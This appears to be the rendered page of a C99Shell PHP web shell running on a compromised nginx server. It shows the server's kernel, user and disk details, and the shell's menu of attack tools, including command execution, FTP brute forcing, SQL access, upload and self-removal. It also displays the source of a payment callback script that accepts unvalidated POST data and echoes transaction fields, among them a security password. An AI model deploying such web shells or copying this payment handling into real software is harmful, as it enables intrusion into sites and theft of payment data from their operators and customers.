!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.18.0. PHP/7.4.29 

uname -a: Linux ip-172-31-23-220 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 07:00:04 UTC 2025
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/payment/   drwxrwxr-x
Free 39.75 GB of 48.28 GB (82.35%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     response.php (1.34 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php  


 
       $responseMessage        
$_POST["msg"];
      
     
// print_r($responseMessage);
       
$dataP                     explode('|',$responseMessage);
     echo 
$saveP['user_id']          =     $dataP['17']; //user id
     
echo$saveP['application_id']   =     $dataP['16']; //application id
     
echo $saveP['customer_id']      = $dataP['1']; //customer id
     
echo $saveP['txn_reference_no'] = $dataP['2'];  //transaction reference number
     
echo $saveP['bank_reference_no']= $dataP['3']; // bank reference number
     
echo $saveP['txn_amount']       = $dataP['4'];
     echo 
$saveP['bank_id']          = $dataP['5'];
     echo 
$saveP['bank_merchand_id'] = $dataP['6'];
     echo 
$saveP['txn_type']         = $dataP['7'];
     echo 
$saveP['currency_name']    = $dataP['8'];
     echo 
$saveP['item_code']        = $dataP['9'];
     echo 
$saveP['security_type']    = $dataP['10'];
     echo 
$saveP['security_id']      = $dataP['11'];
     echo 
$saveP['security_password']= $dataP['12'];
     echo 
$saveP['txn_date']         = $dataP['13'];
     echo 
$saveP['auth_status']      = $dataP['14'];   //succccess and failure
     
     //save payment data in database....
     
if($saveP['auth_status']=='0300')
     {
        
//show success message
        
echo"success";
     }
     else if(
$saveP['auth_status']=='0399')
     {
        
//show failure message....
        
echo"failed";
     }
     
     
//echo"test";
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0052 ]--